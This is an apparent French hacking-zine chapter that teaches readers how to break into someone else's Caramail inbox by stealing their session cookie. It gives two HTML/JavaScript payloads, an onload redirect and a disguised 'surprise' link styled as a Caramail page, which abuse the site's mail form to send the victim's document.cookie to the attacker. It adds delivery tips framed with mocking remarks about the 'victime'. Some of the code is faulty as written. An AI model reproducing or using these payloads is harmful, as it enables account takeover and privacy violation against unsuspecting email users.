²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
² 4°/Hacker une boîte email ²
²²²²²²²²²²²²²²²²²²²²²²²²²²²²²

Bon, si vous avez déjà lu mon premier numéro, vous devez déjà être en train de vous morfondre 
devant votre écran à vous dire que ce chapitre, c'est rien que du rechauffé, etc... 
Non, n'ayez crainte (:p), on va plutôt s'interesser à comment avoir accès à une boîte de 
reception qui ne nous appartient pas, à l'aide d'un simple cookie.
Le principe est très simple, il suffit juste de s'y connaître un peu en HTML. 
Cela va consister à envoyer un script à la victime, maquillé par exemple en image bmp, qui, 
si la victime l'ouvre, nous enverra son cookie identifiant, avec lequel on pourra accèder à 
sa boîte de reception héhéhé...

On va prendre pour exemple une victime possèdant un compte sur caramail.
Caramail est très interessant car, pour envoyer du courrier électronique, on passe par un 
simple formulaire, et c'est cette faille là que nous allons exploiter. 
Ce formulaire se trouve à http://www.caramail.com/cgi-bin/SelectAction? et les commandes 
"d'action", après l'interface cgi-bin,  sont celles ci:

DEALIAS= qui va servir à attacher un fichier
MAILTO= qui va définir l'adresse du récepteur (donc de votre victime lol)
SUBJECT= le sujet du message
BODY= le corp du message, révisez votre HTML bon sang !!
TARGETACTION= qui définit les paramètres de l'envoi du message

On va donc forcer la victime, avec notre script à nous envoyer un mail, par l'intermédiaire de
cette adresse : http://www.caramail.com/cgi-bin/selectaction?dealias=0&mailto=votre_login@caramail.com
&subject=le cookie de votre victime 
(cela étant le sujet du mail que vous devriez reçevoir si la victime éxecute votre script)
&body=" +windows.document.cookie 
(cela correspond en java script à la commande qui va permettre de récupérer le cookie de la page sur laquelle la victime est, 
càd sa boîte de reception niark niark...)+"targetaction=none".
Voilà donc à quoi devra ressembler le code permettant de récuperer ce maudit cookie :((. :

<html>
<body onload="windows.location=http://www.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=votre_login@caramail.com
&SUBJECT=le cookie&BODY=' +windows.document.cookie + '&TARGETACTION=NONE';">
</body> 
</html>

On placera donc ce code dans un fichier txt, que l'on enverra à la victime. 
Si celle-ci l'ouvre, caramail devrait interpreter ce code en html (au cas où cela ne se 
produirait pas, envoyer le même fichier, mais en format *.htm). Vous devrez donc reçevoir 
le cookie de la victime dans la minute qui suit, :p. 

Puis pour ouvir le cookie, utilisez hkit. 
Vous pourrez donc accèder à la boîte de reception de la victime, en utilisant 
l'adresse http://www.caramail.com/NbParFolder
Sinon vous pouvez aussi envoyer ceci, en html, sans passer par "attacher un fichier". 

<html>
<head>
</head>
<body bgcolor="#ffffff" link="#000099" vlink="#000099">
<table border=0 cellpading=0 cellspacing=0 width=100%>
<tr bgcolor=#foe8cc><td colspan=3><center></center></tr></th>
<a href="http://www.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=votre_login@caramail.com
&SUBJECT=le cookie&BODY=' +windows.document.cookie + '&TARGETACTION=NONE"</a>
<center><font face="Arial, Helvetica" size="5">Cliquez ici pour la surprise</font><br>
<font face="Arial, Helvetica" size="1">© 2002 caramail. Tout droits réservés
</font></center> 
<br>
<br>
<br>
</body>
</html>

Recopier ce texte et envoyer le à votre victime, en cochant avant la case "envoyer en html". 
Je trouve d'ailleurs cette méthode encore mieux que la précédente, enfin bon, c'est à vous de voir... 
Avec tout ça, les fake-mails, c'est depassé !! mdr